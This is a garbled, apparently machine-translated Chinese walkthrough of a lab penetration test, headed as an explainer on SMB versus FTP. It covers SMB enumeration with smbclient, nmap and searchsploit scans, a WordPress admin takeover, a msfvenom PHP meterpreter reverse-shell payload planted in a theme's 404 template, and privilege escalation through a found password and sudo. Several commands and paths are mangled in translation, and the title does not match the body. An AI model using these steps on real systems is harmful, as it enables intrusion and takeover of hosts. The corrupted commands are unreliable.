什么是SMB协议-与FTP协议有什么不同-,SMB协议端口

  什么是SMB协议?与FTP协议有什么不同?,SMB协议端口

  SMB(ServerMessage Block)通信协议是微软和英特尔在1987年制定的。主要用作微软网络的通信协议。

  端口139(TCP)-文件和打印共享;Smbd(基于SMB(服务器消息端口445 (TCP)-NetBIOS服务在windos 2000及更高版本中使用该端口,(CIFS,是SMB协议扩展到互联网后的互联网文件共享块)协议,主要用于局域网,文件共享协议)

  39和445是smb协议。

  306开发mysql服务

  1对于smb协议,请使用空白密码。

  smbclient -L ip

  smbclient ip$share

  Ipc是一个空文件,打印机没有访问它的权限。

  获取敏感文件

  -gedit是Linux环境下的文本编辑器,类似于windows中的写字板程序。不需要特别复杂的编程环境,更适合作为基本的文本编辑器。

  306端口开放mysql服务

  不允许远程登录mysql。

  然后通过ssh协议登录主机。

  2分析smb协议的远程溢出漏洞

  Searchsploit samba版本号

  nmap -A -v -T4

  查找samba版本号

  根据http协议漏洞分析

  用浏览器查网站,用Dirb和Nikto检测,找到突破点,后台登录目标,上传webshell。

  迪拉姆http://192

  ==目录:http://192 . 168 . 1 . 108/WordPress/WP-admin/

  登录后台。

  制作webshell

  MSF venom-p PHP/meter preter/reverse _ tcplhost=攻击机IP port=4444-f raw/root/destktop/shell . PHP

  做一个。exe文件,然后将其发送到目标机器Windows。运行后,可以使用msfconsole连接msfvenom服务来控制kali linux上的目标机器。

  进入控制台

  输入run,然后打开网页并点击外观编辑器404模板。

  将shell.php文件中的代码复制到404,上传成功后会显示出来。

  然后通过固定路径http://射击场IP/WordPress/WP-content/themes/twenty fifth/404 . PHP访问webshell。

  然后输入的id反弹回shell。

  下一步也一样,优化终端(python-c " import pty;Pty.spawn(/滑稽外套/巴什) ")

  使用cat /etc/passwd/检查当前系统的其他用户名(注意主目录)并查找togie用户。su togie切换到togie目录,密码用之前找到的12345成功登录。

  或者切换到root权限,使用sudo -l查看苏灿执行什么操作,然后使用sudo su提升权限。

  最后在root找到proof.txt。

什么是SMB协议-与FTP协议有什么不同-,SMB协议端口